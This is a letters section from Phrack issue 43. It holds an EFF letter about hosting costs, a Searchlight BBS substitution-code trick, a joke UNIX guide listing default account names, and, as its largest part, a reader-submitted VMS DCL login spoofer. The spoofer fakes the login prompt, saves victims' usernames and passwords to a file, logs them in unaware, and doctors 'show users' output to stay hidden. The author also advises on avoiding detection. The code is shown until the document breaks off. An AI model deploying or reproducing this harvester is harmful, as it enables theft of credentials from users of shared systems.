==Phrack Magazine==
Volume Four, Issue Forty-Three, File 2 of 27
Phrack Loopback
Part I
- ***************************************************************************
COMING NEXT ISSUE
Van Eck Info (Theory & Practice)
More Cellular (Monitoring Reverse Channel, Broadcasting, Reprogramming)
HUGE University Dialup List (Mail Us YOUR School's Dialup NOW!)
Neato Plans For Evil Devices
Gail Thackeray Gifs
- ********************************** M A I L *********************************
Chris,
Craig Neidorf gave me these addresses as ways to reach you. He tells me
that you are currently editing Phrack. I hope you are well.
Recently the EFF sysadmins, Chris Davis and Helen Rose, informed me that
eff.org was using so much of its T-1 bandwidth that UUNET, who supplies our
IUP connection, was charging us an extra $1,000 per month. They did some
investigation at my request. We determined that Phrack traffic alone was
responsible for over 40% of the total bytes transferred from the site over
the past year or so. This is several gigabytes per month. All in all, the
CuD archive, which contains Phrack, CuD, and other publications accounts
for 85% of our total traffic. All of the email to and from EFF, Usenet
traffic, and other FTP (from the EFF archive, the CAF archive, and others)
constitutes about 15%.
EFF isn't going to be able to carry it any more because it is effectively
costing us $1,000 per month. The fundamental problem is that Phrack is so
popular (at least as a free good) to cause real expense in transmission
costs. Ultimately the users are going to have to pay the costs because
bandwidth (when measured in gigabytes anyway) isn't free. The 12K per
year it costs us to carry Phrack is not something which EFF can justify in
its budget. I'm sure you can understand this.
On July 1, eff.org moves from Cambridge to Washington, DC which is when I
expect we will stop carrying it. I wanted to raise this issue now to let
you know in advance of this happening.
I have also asked Chris and Helen to talk to Brendan Kehoe, who actually
maintains the archive, to see whether there is anything we can do to help
find another site for Phrack or make any other arrangement which will
result in less loss of service.
Mitch
------------------------------------------------------------------------------
Mitchell Kapor, Electronic Frontier Foundation
Note permanent new email address for all correspondence as of 6/1/93
mkapor@kei.com
[Editor: Well, all things must come to an end. Looks like EFF's
move to Washington is leaving behind lots of bad
memories, and looking forward to a happy life in the hotbed
of American politics. We wish them good luck. We also
encourage everyone to join.........CPSR.
In all fairness, I did ask Mitch for more detail about the
specifics of the cost, and he explained that EFF was paying
flat rate for a fractional T-1, and whenever they went over
their allotted bandwidth, they were billed above and beyond
the flat rate. Oh well. Thank GOD for Len Rose.
Phrack now has a new home at ftp.netsys.com.]
- ***************************************************************************
I'm having a really hard time finding a lead to the Information
America Network. I am writing you guys as a last resort. Could
you point me in the right direction? Maybe an access number or
something? Thank you very much.
[Editor: You can reach Information America voice at 404-892-1800.
They will be more than happy to send you loads of info.]
- ***************************************************************************
To whom it may concern:
This is a submission to the next issue of phrack...thanks for the great
'zine!
----------------------------cut here-------------------------------
Greetings Furds:
Have you ever wanted to impress one of those BBS-babes with your astounding
knowledge of board tricks? Well *NOW* you can! Be the life of the party!
Gain and influence friends! Irritate SysOps! Attain the worship and
admiration of your online pals. Searchlight BBS systems (like many other
software packages) have internal strings to display user information in
messages/posts and the like. They are as follows (tested on Searchlight BBS
System v2.25D):
\%A = displays user's access level
\%B = displays baud rate connected at
\%C = unknown
\%F = unknown
\%G = displays graphics status
\%K = displays user's first name
\%L = displays system time
\%M = displays user's time left on system
\%N = displays user's name in format: First Last
\%O = times left to call "today"
\%P = unknown
\%S = displays line/node number and BBS name
\%T = displays user's time limit
\%U = displays user's name in format: FIRST_LAST
All you gotta do is slam the string somewhere in the middle of a post or
something and the value will be inserted for the reader to see.
Example: Hey there chump, I mean \%K, you better UL or log
off of \%S...you leach too damn many files..you got \%M mins
left to upload some new porn GIFs or face bodily harm and
mutilation!.
----------------------------
Have phun!
Inf0rmati0n Surfer (& Dr. Cloakenstein)
SysOp Cranial Manifestations vBBS
[Editor: Ya know, once a LONG LONG time ago, I got on a BBS and
while reading messages noticed that a large amount of
messages seemed to be directed at ME!!# It took me
about 10 minutes to figure it out, but BOY WAS I MAD!
Then I added my own \%U message for the next hapless fool.
:) BIG FUN!]
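
The trick in the letter above works because the board expands substitution codes in text that users wrote. As an added example (not part of the original letter, and not Searchlight's own code), this sketch contrasts a renderer that expands the whole message with one that expands only a sysop-authored header; the header/body split, the field names and the sample data are assumptions.

```python
import re

# Substitution codes from the letter (Searchlight BBS v2.25D). C, F and P are
# listed there as unknown, so they are left out and never expanded here.
# The field names on the right are assumptions made for this sketch.
CODES = {
    "A": "access_level", "B": "baud_rate", "G": "graphics", "K": "first_name",
    "L": "system_time", "M": "minutes_left", "N": "name", "O": "calls_left",
    "S": "node_and_bbs", "T": "time_limit", "U": "name_upper",
}
TOKEN = re.compile(r"\\%([A-Za-z])")


def expand(text, reader):
    # Replace each known code with the value from the *reader's* session.
    def repl(match):
        field = CODES.get(match.group(1).upper())
        return str(reader[field]) if field in reader else match.group(0)
    return TOKEN.sub(repl, text)


def render_unsafe(header, body, reader):
    # Behaviour described in the letter: the poster's body goes through the
    # expander too, so the poster decides what the reader sees "about" them.
    return expand(header + "\n" + body, reader)


def render_safe(header, body, reader):
    # Only the sysop-authored header is expanded; the body is shown verbatim.
    return expand(header, reader) + "\n" + body


def codes_in_post(body):
    # Known codes found in user-submitted text, for a sysop to review.
    return [m.group(0) for m in TOKEN.finditer(body)
            if m.group(1).upper() in CODES]


# Constructed sample data (not from a real board).
READER = {"first_name": "Pat", "minutes_left": 12,
          "node_and_bbs": "Node 1 Example BBS"}
HEADER = r"To: \%K"
BODY = r"Hey \%K, you have \%M mins left on \%S"

if __name__ == "__main__":
    print(render_unsafe(HEADER, BODY, READER))
    print(render_safe(HEADER, BODY, READER))
    print(codes_in_post(BODY))
```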
- ***************************************************************************
-(/)-(\)-(/)-(\)-(/)-(\)-(/)-(\)-(/)-(\)-(/)-(\)-(/)-(\)-(/)-(\)-(/)-(\)-
SotMESC
The US SotMESC Chapter is offering
Scholarships for the 1993 school term.
Entries should be single-spaced paragraphs,
Double-spacing between paragraphs.
The subject should center on an aspect of the
Computer Culture and be between 20-30 pages long.
Send entries to:
SotMESC
PO Box 573
Long Beach, MS 39560
All entries submitted will become the property of the SotMESC
-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-
- ***************************************************************************
The Southwest Netrunner's League's
-----------------------------------------------------------------
WareZ RoDeNtZ Guide to UNIX!!!!
-----------------------------------------------------------------
Compiled by:The Technomancer (UNICOS,UNIX,VMS,and Amigas)
Assists by:SysCon XIV (The Ma'Bell Rapist)
Iron Man MK 4a (Things that make ya go boom)
This file begs to be folded, spindeled,and mutilated.
No Rights Reserved@1993
-----------------------------------------------------------------
Technomancer can be reached at: af604@FreeNet.hsc.colorado.edu
Coming this September.... Shadowland, 68020... Watch this space.
-----------------------------------------------------------------
Part I(Basic commands)
Phile Commands: ls=List Philes
more,page=Display Phile on Yo Terminal
cp=Copy Phile
mv=Move or Remove Philes
rm=Remove Philes
Editor Commnds: vi=Screen Editor
Dirtory cmmnds: dir=Prints Directory
mkdir=Makes a new Directory(also a VERY bad bug)
rmdir=Remove a Directory
pwd=print working directory
Misc. Commands: apropos=Locate commands by keyword lookup.
whatis=Display command description.
man=Displays manual pages online.
cal=Prints calendar
date=Prints the time and date.
who=Prints out every one who is logged in
(Well, almost everyone 7:^] )
---------------------------------------------------------------
Part II(Security(UNIX security, another OXYMORON 7:^] ))
If you are a useless wAReZ r0dEnT who wants to try to Netrun
a UNIX system, try these logins....
root
unmountsys
setup
makefsys
sysadm
powerdown
mountfsys
checkfsys
All I can help ya with on da passwords iz ta give you some
simple guidelines on how they are put together....
6-8 characters
6-8 characters
1 character is a special character (exmpl:# ! ' & *)
-----------------------------------------------------------------
Well thats all fo' now tune in next time, same Hack-time
same Hack-channel!!!
THE TECHNOMANCER                  I have taken all knowledge
af604@FreeNet.hsc.colorado.edu    to be my province
--
Technomancer
Southwest Netrunner's League
- ****************************************************************
[Editor: This is an example of what NOT to send to Phrack.
This is probably the worst piece of garbage I've
received, so I had to print it. I can only hope
that it's a private joke that I just don't get.
Uh, please don't try to write something worse and
submit it hoping to have it singled out as the
next "worst," since I'll just ignore it.]
- ***************************************************************************
Dear Phrack,
I was looking through Phrack 42 and noticed the letters about password
stealers. It just so happened that the same day I had gotten extremely
busted for a program which was infinitely more undetectable. Such is life.
I got off pretty well being an innocent looking female so it's no biggie.
Anyway, I deleted the program the same day because all I could think was
"Shit, I'm fucked". I rewrote a new and improved version, and decided to
submit it. The basic advantages of this decoy are that a) there is no
login failure before the user enters his or her account, and b) the
program defines the show users command for the user so that when they
do show users, the fact that they are running out of another account
doesn't register on their screen.
There are a couple holes in this program that you should probably be
aware of. Neither of these can kick the user back into the account that
the program is running from, so that's no problem, but the program can
still be detected. (So basically, don't run it out of your own account...
except for maybe once...to get a new account to run it out of) First, once
the user has logged into their account (out of your program of course) hitting
control_y twice in a row will cause the terminal to inquire if they are
doing this to terminate the session on the remote node. Oops. It's really no
problem though, because most users wouldn't even know what this meant. The
other problem is that, if the user for some strange reason redefines show:
$show == ""
then the show users screen will no longer eliminate the fact that the account
is set host out of another. That's not a big deal either, however, because
not many people would sit around randomly deciding to redefine show.
The reason I was caught was that I (not even knowing the word "hacker"
until about a month ago) was dumb enough to let all my friends know about the
program and how it worked. The word got spread to redefine show, and that's
what happened. The decoy was caught and traced to me. Enough BS...here's the
program. Sorry...no UNIX...just VMS.
Lady Shade
I wrote the code...but I got so many ideas from my buddies:
Digital Sorcerer, Y.K.F.W., Techno-Pirate, Ephemereal Presence, and Black Ice
------------------------------------------------
$if p1 .eqs. "SHOW" then goto show
$sfile = ""
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!! The role of the dummy file in this program is to tell if the program !!!!
!!!! is being used as a decoy or as a substitute login for the victim. It !!!!
!!!! does not stay in your directory after program termination. !!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
$sfile = f$search("sys$system:[ZJABAD_X]dummy.txt")
$if sfile .nes. "" then goto other
$open/write io user.dat
$close io
$open/write dummy instaar_device:[miller_g]dummy.txt
$close dummy
$wo == "write sys$output"
$line = ""
$user = ""
$pass = ""
$a$ = ""
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!! A login screen with a message informing someone of new mail wouldn't !!!!
!!!! be too cool... !!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
$set broadcast=nomail
$set message/noidenficitaion/noseverity/nofacility/notext
$on error then goto outer
$!on control_y then goto inner
$wo " [H [2J"
$wo ""
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!! insert a fake logout screen here !!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
$wo " ZJABAD_X logged out at ", f$time()
$wo " [2A"
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!! This is the main body of the program. It simulates the system login !!!!
!!!! screen. It also grabs the username and password and sticks them in !!!!
!!!! a file called user.dat !!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
$outer:
$set term/noecho
$inquire a$/nopun ""
$inquire a$/nopun ""
$set term/echo
$c = 0
$c1 = 0
$c2 = 0
$inner:
$c2 = c2 + 1
$if c2 .eqs. 5 then goto speedup
$c = c + 1
$if c .eqs. 15 then goto fail
$if c1 .eqs. 3 then goto fail3
$user = "a"
$wo "Username: "
$from_speedup:
$set term/uppercase
$wo " [2A"
$read/time_out=10/prompt=" [9C " sys$command user
$if user .eqs. "a" then goto timeout
$set term/nouppercase
$if user .eqs. "" then goto inner
$set term/noecho
$inquire pass "Password"
$set term/echo
$if user .eqs. "ME" then goto done
$if pass .eqs. "" then goto fail
$open/append io user.dat
$write io user + " " + pass
$close io
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!! Sends the user into their account !!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
$open/write io set.com
$write io "$set host 0"
$write io user + "/COMMAND=INSTAAR_DEVICE:[MILLER_G]FINDNEXT"
$write io pass
$close io
$@set
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!! Control has been returned to your account !!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
$write io " [2A"
$goto outer
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!! Simulates a failure if the password is null, and also if the !!!!
!!!! username prompt has cycled through 15 times... This is what !!!!
!!!! the system login screen does. !!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
$fail:
$c = 1
$c1 = c1 + 1
$wo "User authorization failure"
$wo " [1A"
$goto inner
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!! After the third failure, the system usually sends the screen back !!!!
!!!! one step...this just handles that. !!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
$fail3:
$wo " [2A"
$goto outer
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!! The system keeps a timeout check in the login. If a username is not !!!!
!!!! entered quickly enough, the timeout message is activated !!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
$timeout:
$set term/nouppercase
$wo "Error reading command input"
$wo "Timeout period expired"
$wo " [2A"
$goto outer
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!! There is a feature in this program which sets the terminal to !!!!
!!!! uppercase for the input of a username. This is wonderful for !!!!
!!!! preventing program detection, but it does cause a problem. It slows !!!!
!!!! the screen down, which looks suspicious. So, in the case where a !!!!
!!!! user walks up to the terminal and holds the return key down for a !!!!
!!!! bit before typing in their username, this section speeds up the run !!!!
!!!! considerably. !!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
$speedup:
$set term/nouppercase
$fast_loop:
$user = "a"
$read/time_out=1/prompt="Username: " sys$command io
$if user .eqs. "a" then goto from_speedup
$goto fast_loop
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!! This section is optional. There are many ways that you can implement !!!!
!!!! to break out of the program when you think you have gotten enough !!!!
!!!! passwords. 1), you can sit down at the terminal and type in a string !!!!
!!!! for the username and pass which kicks you out. If this option is !!!!
!!!! implemented, you should at least put in something that looks like !!!!
!!!! you have just logged in, the program should not kick straight back !!!!
!!!! to your command level, but rather execute your login.com. 2) You !!!!
!!!! can log in to the account which is stealing the password from a !!!!
!!!! different terminal and stop the process on the account which is !!!!
!!!! running the program. This is much safer, and my recommendation. !!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
$done:
$set broadcast=mail
$set message/facility/text/identification/severity
$delete dummy.txt;*
$exit
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!! This section is how one covers up the fact that the account which has !!!!
!!!! been stolen is running out of another. Basically, the area of the show!!!!
!!!! users screen which registers this is at the far right hand side. !!!!
!!!! This section first writes the show users data to a file and alters !!!!
!!!! it before it is written to the screen for viewing by the user. There !!!!
!!!! may exist many forms of the show users command in your system, and !!!!
!!!! you may have to handle each one differently. I have written only two !!!!
!!!! manipulations into this code to be used as an example. But looking !!!!
!!!! at how this is performed should be enough to allow you to write your !!!!
!!!! own special cases. Notice that what happens to activate this section !!!!
!!!! of the program is the computer detects the word "show" and interprets !!!!
!!!! it as a procedure call. The words following show become variables !!!!
!!!! passed into the program as p1, p2, etc. in the order which they !!!!
!!!! were typed after the word show. Also, by incorporating a third data !!!!
!!!! file into the manipulations, one can extract the terminal id for the !!!!
!!!! account which the program is running out of and plug this into the !!!!
!!!! place where the user's line displays his or her terminal id. Doing !!!!
!!!! this is better than putting in a fake terminal id, but that is just a !!!!
!!!! minor detail. !!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
$show:
$show = ""
$show$ = ""
$length = 0
$ch = ""
$full = 0
$c = 0
$if (f$extract(5,1,p2) .eqs. "/") .and. (f$extract(6,4,p2) .nes. "FULL") then show 'p1'
$if (p2 .eqs. "USERS/FULL") .and. (p3 .eqs. "") then goto ufull
$if p2 .eqs. "USERS" .and. p3 .eqs. "" then show users
$if p2 .eqs. "USERS" .and. p3 .eqs. "" then exit
$if p3 .eqs. "" then goto fallout
$goto full
$fallout:
$show 'p2' 'p3'
$exit
$ufull:
$show users/full/output=users.dat
$goto manipulate
$full:
$show$ = p3 + "/output=users.dat"
$show users 'show